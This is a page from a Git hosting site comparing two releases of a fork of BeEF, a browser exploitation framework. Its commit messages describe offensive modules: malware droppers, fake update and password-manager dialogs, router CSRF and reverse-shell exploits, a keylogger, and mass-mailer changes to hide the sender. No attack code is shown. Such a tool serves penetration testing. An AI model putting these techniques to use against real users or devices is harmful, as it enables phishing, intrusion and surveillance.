Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.3.9
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
..
compare: Hiddenden:beef-0.4.4.8
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

335 Commits
beef-0.4.3 ... beef-0.4.4

Author SHA1 Message Date
bcoles
ce2b5293af Add support for Firefox 25 2013-11-05 14:45:27 +10:30
bcoles
05502a3c91 fix bug preventing loading of 'replace_video_fake_plugin' module 2013-11-04 15:52:54 +10:30
Michele Orru
441ccbbfce Merge pull request #941 from gcattani/LcamtufDownload 
Module Update: lcamtuf Download
 2013-10-30 10:31:57 -07:00
gcatt
f1df608f64 Module Update: lcamtuf Download 
Updated Adobe Flash Player URL to the current one.
 2013-10-30 18:29:44 +01:00
Michele Orru
24bf95ff16 Merge pull request #940 from gcattani/FakeFlashUpdate 
Module Update: Fake Flash Update
 2013-10-30 10:15:28 -07:00
gcatt
9987f0781f Module Update: Fake Flash Update 
Updated the prompted picture and part of the module.
 2013-10-30 17:05:01 +01:00
bcoles
41bfb8e995 Fix bug with Unity Web Player detection 
Fix issue #910
 2013-10-17 17:54:16 +10:30
Michele Orru
77950ae680 Merge pull request #938 from gcattani/hasUnity 
Module: Detect Unity Web Player
 2013-10-15 06:53:41 -07:00
gcatt
d4c69f2bfd Module: Detect Unity Web Player 2013-10-15 15:47:47 +02:00
bcoles
8e6751611d Add beef.browser.getPageHead() and beef.browser.getPageBody() 
Update 'Get Page HTML' module to use these functions

Tested on IE6, FF22, C28

Fix issue #518
 2013-10-13 03:37:15 +10:30
bcoles
09443675cc Fix bug in fake_notification_ff module 2013-10-12 00:43:54 +10:30
bcoles
70cac51a5d Add error check for missing dropper 2013-10-11 23:14:56 +10:30
antisnatchor
69ff8c0013 Added rubyzip dependency to core.rb. Fixed a bug in dom.js when attaching applets for IE. 2013-10-10 20:54:29 +01:00
antisnatchor
050da281ac Modified Gemfile. Added missing directory for Firefox Extension dropper module. 2013-10-10 20:47:14 +01:00
antisnatchor
5dd46ffd72 From antisnatchor with love. New module: malicious Firefox Extension dropper. Based on @mihi42 FF extension. 2013-10-10 15:18:03 +01:00
antisnatchor
45c51180a6 Completely removed deployJava ro prevent CtP issues on Firefox. 2013-10-09 16:11:27 +01:00
antisnatchor
b280d099f8 From antisnatchor with love. New module: Signed Java Applet dropper (win only for now). 2013-10-08 17:02:02 +01:00
antisnatchor
2c750670d7 fixed doctype error in basic.html (IE only) 2013-10-08 15:21:54 +01:00
antisnatchor
71a67defd4 Added new RESTful API method to bind a local file to a url. Also added "dropper" directory into Social Engineering extension. 2013-10-08 14:08:52 +01:00
bcoles
638e037e56 Remove Java and VLC detection from hook init 2013-10-06 19:17:55 +10:30
Christian Frichot
8033b77b73 Support for Chrome version 30 in browser detection 2013-10-06 17:20:01 +08:00
antisnatchor
2f51deb88a Fixed issue with Social Engineering extension when using an SMTP server without any needed authentication. 2013-10-02 14:53:04 +01:00
antisnatchor
8d44b48768 Added dependency to therubyracer (V8 implementation for Ruby) if the OS is not OSX. 2013-10-02 14:24:22 +01:00
antisnatchor
86d23d3815 Fix issue #662 the Web UI base path can now be configured in the main config.yaml. Web UI JS files are now also minified. 2013-10-01 17:16:46 +01:00
bmantra
a1f102b869 Merge pull request #933 from bmantra/master 
initial commit of the beef bind shellcode
 2013-09-28 12:18:21 -07:00
bmantra
fa95ac5b55 initial commit of the beef bind shellcode 2013-09-28 21:18:23 +02:00
Michele Orru
5980eff047 Merge pull request #931 from DinisCruz/patch-1 
adding info to read me about running beef in windows
 2013-09-27 02:10:45 -07:00
Dinis Cruz
31587f689b adding into to read me about running beef in windows 2013-09-27 00:59:36 +01:00
bcoles
5942138aba Update spyder eye module 
* file error handling
* render the screenshot in the admin UI
* log screenshot filename to master logs
 2013-09-12 18:29:56 +09:30
bcoles
189e6543e0 Fix bug with rendering images from command responses in the admin UI 2013-09-12 18:26:00 +09:30
bcoles
25aca3d291 Update 'command.js' for Spyder Eye module 2013-09-11 15:26:15 +09:30
bcoles
257a310a02 Update 'module.rb' for Spyder Eye module 2013-09-11 15:24:54 +09:30
bcoles
2420d59a72 Update 'config.yaml' for Spyder Eye module 2013-09-11 15:20:19 +09:30
Brendan Coles
66f01ff4e6 Merge pull request #930 from preth00nker/master 
adding generic module to take screenshoots with canvas
 2013-09-10 23:33:37 -07:00
Christian
3f7eec4e28 adding generic module to take screenshoots with canvas 2013-09-09 13:52:13 -05:00
Christian Frichot
1b6159ebeb New Module - Detect Internal IP with WebRTC. See Issue #929 2013-09-08 11:09:57 +08:00
Christian Frichot
df4b0bce5e Supports Chrome 29 detection 2013-09-07 12:56:21 +08:00
Saafan
d872a5a3e7 Merge remote-tracking branch 'origin/master' into Detect-Java 
Conflicts:
	core/main/client/browser.js
 2013-08-20 05:55:27 -04:00
bcoles
f5b86e7894 Add metasploit default path for kali 2013-08-19 12:37:35 +09:30
bcoles
db83cdd086 Add metasploit default path for pentoo - take 2 2013-08-19 12:37:06 +09:30
bcoles
e9e085e9e1 Add metasploit default path for pentoo 2013-08-17 21:56:42 +09:30
Brendan Coles
62a5d5e96c Merge pull request #927 from thefinn93/spellingfix 
Correct minor typo in the default config.yml
 2013-08-11 02:22:52 -07:00
Finn Herzfeld
173178e1d6 Updated text as requested by bcoles 2013-08-11 00:07:59 -07:00
bcoles
f2883e0c94 Fixed typo 
Extra 'i' from vim insert mode
 2013-08-09 13:34:24 +09:30
bcoles
858814c614 Update BeEF core to complete HTTPS support 
Part of issue #745
 2013-08-09 13:28:35 +09:30
bcoles
21417dc3e2 Update BeEF server protocol for multiple modules to use 
`beef.http.https.enable`

Now uses the `beef.net.httpproto` value rather than a hard-coded
protocol string.

Part of issue #745
 2013-08-09 13:21:33 +09:30
Finn Herzfeld
ca8f5d37e1 Corrected minor typo 2013-08-06 17:03:17 -07:00
bcoles
c6314f97cb Update version to beef-0.4.4.7-alpha 2013-08-04 16:45:24 +09:30
Brendan Coles
1a5b21765f Merge pull request #924 from phihag/install-pipeline-instead-of-fifo 
Use a pipe instead of a fifo during installation
 2013-08-04 00:54:26 -07:00
Brendan Coles
9fe27b113f Merge pull request #923 from phihag/install-abort-on-error 
Update install to abort on error
 2013-08-04 00:52:56 -07:00
Saafan
402f4997df Fixing java support by separating Oracle deployement toolkit in a separate file. #786 2013-08-03 16:25:46 -04:00
Philipp Hagemeister
3948750571 Use a pipe instead of a fifo during installation 
bash's anonymous fifos are only available if devfs is mounted.
On a system without /dev mounted (which is perfectly reasonable for a locked-down security testing machine), installing beef fails with (after applying #923)

    install-beef: line 81: /dev/fd/62: No such file or directory

This commit fixes and lets the installation run through.
 2013-08-01 17:33:09 +02:00
Philipp Hagemeister
957510b6d9 Abort on error 
On a (debian) system without sudo, lots of messages rush by, and it's not obvious was fails.
With this change, the log looks like:

    $ bash install-beef
    bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
    ======================================
               BeEF Installer
    ======================================

    CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environemnt and it's dependencies.

    In rare cases, this may lead to unexpected behaviour or package conflicts on some systems.

    Are you sure you wish to continue (Y/n)?

    Detecting OS..
    Debian/Ubuntu Detected
    Installing Prerequisite Packages..
    install-beef: line 74: sudo: command not found

which is far more informative.
 2013-08-01 17:30:00 +02:00
Christian Frichot
7f64c94e03 New Module - Fake LastPass Dialog 2013-07-21 13:53:44 +08:00
Christian Frichot
82a70fbcd0 Detect LastPass module (except on IE) - #802 2013-07-20 13:58:20 +08:00
Christian Frichot
a22926bc53 Merge remote-tracking branch 'origin/master' 2013-07-08 19:41:10 +08:00
bcoles
2c2b9a85f4 Update browser fingerprinting module firefox signatures 2013-07-08 10:57:02 +09:30
bcoles
dd811ca234 Add proxy detection using http headers to browser details 
Add proxy details to browser log

Part of issue #527

Note: does not work for transparent proxies
 2013-07-08 00:25:49 +09:30
Christian Frichot
acfdf45d16 Merge remote-tracking branch 'origin/master' 2013-07-06 15:10:43 +08:00
bcoles
e88c3c1f86 Add fake_notification_c module 
Part of issue #695
 2013-07-05 01:17:20 +09:30
bcoles
32b48e5172 Add some client-side debugging to browser.js 
Perform minor code formatting changes
 2013-07-04 23:50:34 +09:30
bcoles
b16d7e3563 Add fake_notification_ff module 
Rename fake_notification module to fake_notification_ie
 2013-07-04 23:12:01 +09:30
Christian Frichot
7e73c0a532 Merge remote-tracking branch 'origin/master' 2013-07-04 20:14:29 +08:00
bcoles
1bddb00ec8 Add Replace Video (Fake Plugin) module 
Fix issue #695
 2013-07-04 11:54:52 +09:30
bcoles
9daacd799e Update version to beef-0.4.4.7 2013-07-04 08:20:05 +09:30
bcoles
4fe51dcd28 Update version to '0.4.4.6.1-alpha' bug fix edition 2013-07-04 08:17:17 +09:30
bcoles
af6cf9e5d4 Add Firefox 23 and 24 support for Firefox aurora/beta users 
Firefox 23 ETA August 2013
Firefox 24 ETA September 2013
 2013-07-04 07:39:23 +09:30
BWZ
3705009982 LiveCD - updade bundles during beef update 
Fixes #918
 2013-07-02 18:19:41 +10:00
antisnatchor
7f1473ccbf Added detection for Firefox 22 (and improved detection of FF 21/22 with a new DOM object). 2013-07-01 17:32:00 +01:00
antisnatchor
f869d2924a Fixed an XSS discovered by Mario in the default keylogger. 2013-07-01 15:24:36 +01:00
Christian Frichot
0b1c753bd3 Merge remote-tracking branch 'origin/master' 2013-07-01 16:22:20 +08:00
gcatt
f6ebe9fac0 Revert "Add Unity Web Player detection" 
This reverts commit 696e3715fe.
 2013-07-01 10:11:20 +02:00
Christian Frichot
570a8266ed Merge remote-tracking branch 'origin/master' 2013-07-01 16:10:33 +08:00
gcatt
696e3715fe Add Unity Web Player detection 2013-07-01 10:07:47 +02:00
Christian Frichot
53536d9d86 Merge remote-tracking branch 'origin/master' 2013-07-01 07:04:42 +08:00
bcoles
e61b266921 update version 2013-07-01 00:42:47 +09:30
bmantra
8cf17b01a5 Merge pull request #916 from bmantra/master 
added option to use only LF in the bind shell module for use with Linux
 2013-06-28 11:43:27 -07:00
bmantra
164ff5bea6 added option for LF only, to use with Linux 2013-06-28 20:42:53 +02:00
Michele Orru
6c6a33db50 Merge pull request #915 from Nbblrr/master 
DNS Enumeration modules does not consider the user timeout parameter
 2013-06-28 05:48:54 -07:00
Nbblrr
e95c74b5e1 DNS Enumeration module does not consider the user timeout parameter 2013-06-28 14:33:33 +02:00
Michele Orru
c70fa80468 Merge pull request #911 from gcattani/910-HasUnity 
Add Unity Web Player detection
 2013-06-19 03:06:42 -07:00
gcatt
1be8ec12fd Add Unity Web Player detection 2013-06-18 23:59:43 +02:00
Christian Frichot
0dd499c71a Updated browser detection to capture Chrome under iOS. See Issue #909 2013-06-16 16:19:58 +08:00
Christian Frichot
dab58f0e61 Updated hardware constants better detects and displays pure Nexus phones. Issue #908 2013-06-16 14:49:39 +08:00
Christian Frichot
2e68470d23 Android OS Icon should now display. See Issue #907 2013-06-16 14:27:12 +08:00
Christian Frichot
473f349394 Missing apostrophe in PHP-5.3.9-dos module.rb. This was breaking Rake. Make sure you run rake peeps before pushing! 2013-06-15 13:48:05 +08:00
Christian Frichot
dbebf12d27 Update to browser_filter. See Issue #906 2013-06-15 13:45:24 +08:00
Christian Frichot
96f763b7e0 Chrome 27/28 detection. Fixes Issue #905 2013-06-15 13:41:41 +08:00
bcoles
d40486c391 Add airlive_ip_camera_csrf module 2013-06-14 15:28:35 +09:30
Brendan Coles
d43f443555 Merge pull request #904 from Nbblrr/master 
Add modules for detecting MS Office version and Bitdefender 2012

Fix issue #902
Fix issue #903
 2013-06-13 22:38:37 -07:00
Nbblrr
2b473bfda9 Add module which detect MS Office version. Closes #903 2013-06-14 00:39:39 +02:00
Nbblrr
a2b627c8ae Add module to detect bitdefender 2012. Closes #902 2013-06-14 00:07:00 +02:00
bcoles
dbabb379fb Add Iceweasel detection in browser.js 2013-06-02 05:14:33 +09:30
bcoles
5252bea54a Add Get Form Values module 
This module retrieves the name, type, and value of all input
fields for all forms on the page.
 2013-06-02 05:11:45 +09:30
bcoles
7fdfcc3ef0 Add beef.browser.isA() to avant_steal_history module 
Part of issue #774
 2013-06-02 03:19:05 +09:30
bcoles
3c5b68e112 Add beef.browser.isA() to detect Avant Browser 
Fixes issue #774
 2013-06-02 03:14:29 +09:30
Michele Orru
9e17958268 Merge pull request #900 from james-otten/master 
Added Actiontec Q1000 router CSRF module
 2013-05-31 02:36:40 -07:00
James Otten
f2efa533c8 Added Actiontec Q1000 CSRF module 2013-05-30 15:49:47 -05:00
Christian Frichot
9636cb0972 Updated Gmail detection URL. Fixes #Issue 899 2013-05-28 20:34:56 +08:00
bcoles
1dc59f7b01 Add D-Link ShareCenter command execution exploit module 2013-05-27 13:50:12 +09:30
bcoles
ff620d42f4 Add belkin_dns_csrf DNS hijack module 
Part of issue #538
 2013-05-27 12:50:06 +09:30
bcoles
61e6337046 Remove zenoss_daemon_csrf module 2013-05-27 12:14:27 +09:30
bcoles
639d0611a6 Add command_id to embedded iframe/img IDs for router exploits 
This prevents a race condition where duplicate iframes/imgs are
created if a module is run twice simultaneously. The second iframe/img
was not being removed during `cleanup()`.
 2013-05-27 11:56:01 +09:30
bcoles
ab7a62e8a4 Update version 2013-05-27 10:40:58 +09:30
Michele Orru
71f04d82f5 Merge pull request #849 from geefunkmasterpro/master 
Enhancements to Mass Mailer
 2013-05-26 04:58:57 -07:00
bcoles
704b979054 minor syntax changes to php-5.3.9-dos module 2013-05-26 02:48:04 +09:30
bcoles
7aaafc79aa Remove bi-directional communication from IPEC win bindshell module 2013-05-26 02:41:04 +09:30
bcoles
f90ad4a261 Add detection for WebRTC support 2013-05-24 17:06:36 +09:30
bcoles
0dfab0e348 Add EXTRAnet Collaboration Tool Command Execution exploit module 2013-05-24 16:40:02 +09:30
bcoles
018a849e14 Add 'path' argument for beef.dom.createIframeIpecForm() 2013-05-24 14:01:21 +09:30
bcoles
717f63ff0c Add ruby-nntpd Command Execution exploit module 2013-05-24 13:50:04 +09:30
bcoles
9bac6b4fc1 Add support for Firefox 21 2013-05-24 13:47:31 +09:30
bcoles
2dae1d4c07 Add /bin/sh -c to default command 2013-05-22 14:37:01 +09:30
bcoles
7de48ceafb Add GroovyShell Server Command Execution IPEC exploit module 2013-05-22 02:32:27 +09:30
Brendan Coles
8ecdceb928 Merge pull request #894 from sgorbaty/master 
New functionality - detect phonegap plugins
 2013-05-09 01:59:49 -07:00
Sergey Gorbaty
498372aef3 Adding phonegap integration with keychain plugin 2013-05-08 13:18:31 -07:00
Sergey Gorbaty
55d8506960 Added primitive phonegap plugin detection 2013-05-07 17:10:12 -07:00
antisnatchor
8d60c10298 Merge branch 'master' of https://github.com/beefproject/beef 2013-05-07 13:04:19 +02:00
antisnatchor
94d15cd386 Added DOS module which allows you to send multiple GET or POST requests to a target, from a WebWorker in order to don't slow down the whole browser. 2013-05-07 13:00:34 +02:00
bcoles
5bbf26abac Add beef.http.dns_port config option 2013-05-06 16:03:17 +09:30
Brendan Coles
5b90c351da Merge pull request #888 from sgorbaty/master 
Adding new features to Phonegap module
 2013-05-05 17:26:31 -07:00
antisnatchor
b501fe7c1a Updated Rack dependency in Gemfile in order to don't create conflicts with the updated Sinatra dependency. 2013-05-04 09:42:40 +01:00
Michele Orru
b28e631500 Merge pull request #889 from 0x1a0ran/master 
Bug fix: cross-origin XHR with "Origin" or "Referrer" header set always return 403.
 2013-05-04 01:30:42 -07:00
Sergey Gorbaty
5722cb2bc1 Added email to contact list 2013-05-03 14:24:23 -07:00
Sergey Gorbaty
0479744dfc added device model detection 2013-05-03 14:14:19 -07:00
Sergey Gorbaty
3dbfdbac7e Adding user prompt 2013-05-03 14:02:53 -07:00
Sergey Gorbaty
d3262d9451 Adding local detection 2013-05-03 13:34:09 -07:00
Sergey Gorbaty
906ca6ccce Cordova detection added 2013-05-03 13:13:24 -07:00
Xiaoran Wang
ea560c3464 Added configurable port for postsql and mysql 2013-05-03 13:01:37 -07:00
Xiaoran Wang
b79402ce5f updated sinatra from 1.3.2 to 1.4.2 to fix the CORS request always return a 403 bug. link here https://github.com/sinatra/sinatra/issues/518 2013-05-03 11:02:11 -07:00
Sergey Gorbaty
1699d52475 adding contact list 2013-05-03 10:09:09 -07:00
antisnatchor
c5d5b99472 Issue #886: The preflight OPTIONS request now allow also the content-type header, required to use a json conten-type with POST requests. 2013-05-02 10:55:16 +01:00
antisnatchor
9915547b19 Issue #886: Added support for preflight OPTIONS request. 2013-05-01 17:19:48 +01:00
antisnatchor
ef2eac26eb Issue #886: Added support for CORS on the Router object. The RESTful aPI can not be called from JS x-domain. 2013-05-01 11:15:21 +01:00
bcoles
09be2db069 Update version to beef-0.4.4.5 2013-05-01 17:53:21 +09:30
bcoles
6da4e2c39c Update version to '0.4.4.4.1-alpha' bug fix edition 2013-05-01 17:49:21 +09:30
bcoles
15c7e64e93 Fix bug with module image result rendering in admin UI 2013-05-01 17:47:00 +09:30
bcoles
91e2b36ce4 Update webcam module so the picture returned as a base64 encoded string 
will be rendered in the admin UI
 2013-05-01 16:44:28 +09:30
bcoles
b82696ead2 Enabled web server imitation by default 
The time has come. This feature has been stable for a while.
 2013-05-01 16:43:26 +09:30
bcoles
7233957664 Update version 2013-04-30 18:56:37 +09:30
bcoles
88678f986c Add 'Debug -> Test Return Image' module 
Part of isse #883
 2013-04-30 18:40:25 +09:30
bcoles
719bb4a20b Fixed malformed YAML in modules/browser/get_visited_domains/config.yaml 2013-04-25 01:37:15 +09:30
antisnatchor
4ea18852f6 Updated eventmachine gem version in Gemfile. 2013-04-21 10:52:46 +01:00
qswain2
c16479a14e Add chrome support to get_visited_domains 
Added chrme implementation based on visipisi
 2013-04-19 01:02:48 -04:00
bcoles
59951959f1 Add Opencart password reset CSRF module 
This module hasn't been tested against an Opencart instance
 2013-04-19 09:18:05 +09:30
bcoles
da763df110 Uncommented several instances of beef.debug() - Part of issue #862 2013-04-17 22:12:35 +09:30
bcoles
4980ca02a6 Add beef.client.debug config property - Part of issue #862 
Client-side debugging is disabled by default

`beef.debug()` now only shows messages if `beef.client.debug` is true
 2013-04-17 22:05:31 +09:30
Christian Frichot
6e0f7a266e Issue #883. Admin UI will inline display images from the HTML5 webcam module now 2013-04-15 19:28:52 +08:00
Christian Frichot
e3cb7f7a2d #882. New HTML5 WebRTC Webcam Module 2013-04-15 19:20:48 +08:00
Christian Frichot
6e9db43463 Fixes issue #881. Console fix for reviewing previous responses 2013-04-15 19:18:07 +08:00
bcoles
a172362452 Part of issue #862 - Add beef.debug() for client-side debugging 
Add `beef.debug()` function - wraps `console.log()`

Debug messages are suppressed for browsers which don't support `console.log()`

Update './core/*' to use `beef.debug()` instead of `console.log()`
Update './modules/*' to use `beef.debug()` instead of `console.log()`
Update './extensions/*' to use `beef.debug()` instead of `console.log()`

Add 'modules/debug/test_beef_debug/' module
 2013-04-15 16:49:01 +09:30
bcoles
55b0bee9ca Re-enable XSS-Rays vectors containing ' charater 
Fix issue #47
 2013-04-14 20:38:41 +09:30
Christian Frichot
950c3d37a7 Fixes Issue #880. Detect Tor update - now works 2013-04-13 14:51:34 +08:00
Christian Frichot
1721d3c263 Fixes issue #879. Console enhancements. 2013-04-13 14:48:40 +08:00
antisnatchor
5585879cca Updated multiple core files to use hook_session_name consistently from the config.yaml file. 2013-04-09 10:25:49 +01:00
Christian Frichot
d855100ac9 Fixes #878 and #758. 2013-04-08 21:52:50 +08:00
Christian Frichot
fad33dfea7 Fixes #877. New IE Fake Notification Bar Module 2013-04-08 19:36:02 +08:00
Christian Frichot
b4732a9438 Fixes #876. Can detect Chrome 26. 2013-04-08 13:08:56 +08:00
antisnatchor
73e291832e Replacing document.location.href with location in xssrays.js. 2013-04-07 15:54:14 +01:00
antisnatchor
85b204f52b Updated beef.hardware component name for consistency. 2013-04-07 13:19:23 +01:00
antisnatchor
78410e28eb Changed attachApplet dom.js method to use <applet> also for Firefox, instead of the <embed> tag. This fixes some issues when running Signed Applets. 2013-04-06 12:30:00 +01:00
antisnatchor
222cff3f1d Added a README file for the JavaPaylod signed applet exploit. 2013-04-06 12:29:05 +01:00
Christian Frichot
2ef1b5bab8 Updates gmail phishing command module. Fixes #873 2013-04-06 15:54:55 +08:00
Christian Frichot
af67c6a8d9 Few enhancements to dom.js. See #870 #871 #872 2013-04-06 15:52:32 +08:00
Christian Frichot
79572a61f0 Renamed webcam_permission_check module 2013-04-06 14:35:21 +08:00
Christian Frichot
2fcdf1038d xntriks updates to webcam_perm_check 2013-04-06 14:32:51 +08:00
Christian Frichot
cca21f1003 Merge pull request #869 from bw-z/master 
Added Webcam Permission Check Module - which I'll then update.
 2013-04-05 23:29:21 -07:00
Christian Frichot
07fe3a9c0e Updates to tabnabbing module to use jQuerys wider event handling. #868 2013-04-04 21:33:43 +08:00
Christian Frichot
69fd3e600c Event log now logs when a zombie comes back online. #867 2013-04-04 21:29:18 +08:00
Christian Frichot
ae98842ad4 Tiny fix to Clippy so it appears properly. #866 2013-04-04 19:37:08 +08:00
bcoles
159ecb5ade Fix malformed YAML in 'deface_web_page_component' module 2013-04-04 00:04:45 +10:30
BWZ
cf4ab9533e Added Webcam Permission Check Module 2013-04-03 09:01:15 +10:00
Christian Frichot
9a23ed758e New getHighestZindex function in beef.dom and updated createIframe beef.dom function. #865 2013-04-02 14:33:57 +08:00
Christian Frichot
389f27360d Slight spelling mistake fix up in the Welcome tab of the Admin UI 2013-04-01 19:51:16 +08:00
Christian Frichot
e8eda3ef99 Minor enhancements to the Admin UI. #864 2013-04-01 11:07:50 +08:00
Saafan
af8018500b Fixing some unit tests 2013-03-31 16:22:58 +02:00
Christian Frichot
22cd68101d Added Bookmarklet to the Welcome Tab in the Admin UI. #863 2013-03-30 17:31:36 +08:00
bcoles
760e7a456e Update version 2013-03-29 15:59:48 +10:30
Christian Frichot
26933fe146 Fix for #826. Plus - logs also include a column for which browser an event is associated with 2013-03-29 13:33:09 +08:00
bcoles
9ca50e0505 Comment out two console.log() lines in hookChildFrames 2013-03-29 15:16:56 +10:30
Christian Frichot
31e1ddddaf New Defacement Module - but only rewrites targeted content. #861 2013-03-25 19:33:38 +08:00
Christian Frichot
7e57313e21 New Link Rewrite (Hidden using overwritten click handling) module. #860 2013-03-25 19:26:59 +08:00
BWZ
c0f0735150 LiveCD config files and splash logo 2013-03-25 12:08:25 +10:00
BWZ
39bc121b76 LiveCD - Added IP Address to GUI when ssh enabled 2013-03-25 11:29:02 +10:00
BWZ
dc4665e1d3 LiveCD - Updated URI + Version + MD5 2013-03-25 11:21:00 +10:00
Brendan Coles
497c3eb3f3 Merge pull request #859 from gcattani/ApacheCookieDisclosure 
Module: Apache HTTP Server cookie disclosure (exploit)
 2013-03-19 11:22:59 -07:00
gcatt
6abb21ac53 Module: Apache HTTP Server cookie disclosure (exploit) 2013-03-19 17:29:48 +01:00
bcoles
fb26ef5f71 Add beef.browser.hookChildFrames() 
BeEF now automatically hooks all same-domain child (i)frames

Allows logging of child frame events - fixes issue #493
 2013-03-18 00:37:15 +10:30
bcoles
c98d9a4300 Manually merged Windows Media Player detection from @gcattani 
Fix issue #833

Fix issue #847
 2013-03-17 03:30:12 +10:30
bcoles
f3f624e9a4 Fixed bug introduced in commit 8132eb0e53 2013-03-17 03:21:38 +10:30
bcoles
8132eb0e53 Solution: Hide beef behind an apache webserver 
Manually merge code from @lalaglubsch

Add support for BeEF through a proxy

Fix issue #856
 2013-03-16 20:12:27 +10:30
antisnatchor
7364529b26 Merge branch 'master' of https://github.com/beefproject/beef 2013-03-12 10:57:16 +00:00
antisnatchor
de1de356f7 Added GoogleWebStore module.rb option. Modified link opener to support data URI injections. 2013-03-12 10:57:07 +00:00
Brendan Coles
4cec0cb1b8 Merge pull request #855 from javuto/829-Foxit-reader-plugin-detection 
Detection added for the Foxit Reader plugin, fixes #829
 2013-03-10 21:44:07 -07:00
Javier Marcos
657aac9dcd Detection added for the Foxit Reader plugin, fixes #829 2013-03-11 00:19:19 +00:00
bmantra
2d710a1bcf Merge pull request #853 from bmantra/master 
add fingerprint of m0n0wall to internal network fingerprint module
 2013-03-08 12:03:07 -08:00
bmantra
2484704fe8 add fingerprint for m0n0wall 2013-03-08 21:00:52 +01:00
Michele Orru
7ad93130d9 Merge pull request #852 from bmantra/master 
Added m0n0wall 1.33 CSRF root reverse shell exploit #824
 2013-03-07 08:45:42 -08:00
bmantra
de2bd15769 module for m0n0wall csrf reverse root shell #824 2013-03-06 19:34:27 +01:00
antisnatchor
713a20f157 Replaced eval with new Function when executing data coming from BeEF's WebSocket server. 2013-03-05 10:37:49 +00:00
antisnatchor
6a968e77c0 Removed all the crappy Oracle code to detect if java is enabled. Was preventing x-domain hooking on FF. 2013-03-04 22:07:47 +00:00
antisnatchor
710769283e Merge branch 'master' of https://github.com/beefproject/beef 2013-03-03 11:26:29 +00:00
antisnatchor
b4d690a5f3 det_visited_domains now supports also Opera. 2013-03-03 11:26:00 +00:00
antisnatchor
4e7b983bd3 Added support for Chrome 25. 2013-03-03 11:24:08 +00:00
qswain2
0ea1c0bbf8 Add chrome/opera support to get_visited_domains 
Added chrome/opera support for lcamtuf cache timing script
in get_visited_domains module.

Signed-off-by: antisnatchor <antisnatchor@gmail.com>
 2013-03-03 11:16:07 +00:00
Michele Orru
58fb939b96 Merge pull request #848 from claudijd/add_dot_rvmrc_to_dot_gitignore 
Add .rvmrc to .gitignore
 2013-03-03 00:16:53 -08:00
Jonathan Claudius
6f035bdf05 Add .rvmrc to .gitignore 2013-03-02 17:32:44 -06:00
geefunkmasterpro
66d0e3535b Added fromaddr to mass mailer JSON interface so emails can be sent from 
any address without restart.

Removed fromaddr entry from config.yaml.
 2013-02-27 23:29:08 +11:00
geefunkmasterpro
e79372f8ac Added auth field to config so that emails are harder to track to sender 
Added error handling to identify:
  - errors creating the mail headers
  - errors processing JSON input
  - errors in the mailer configuration
 2013-02-27 21:33:48 +11:00
bcoles
83749aad08 Add support for Firefox 20 2013-02-26 13:17:14 +10:30
bcoles
127e3cc0bb Updated version 2013-02-26 12:08:05 +10:30
Brendan Coles
ed661e2a22 Merge pull request #845 from bcoles/raw_http 
Add 'bind_raw' to asset handler
 2013-02-22 23:21:40 -08:00
bcoles
0d8521dd7b Add 'bind_raw' to asset handler 2013-02-23 16:57:47 +10:30
bcoles
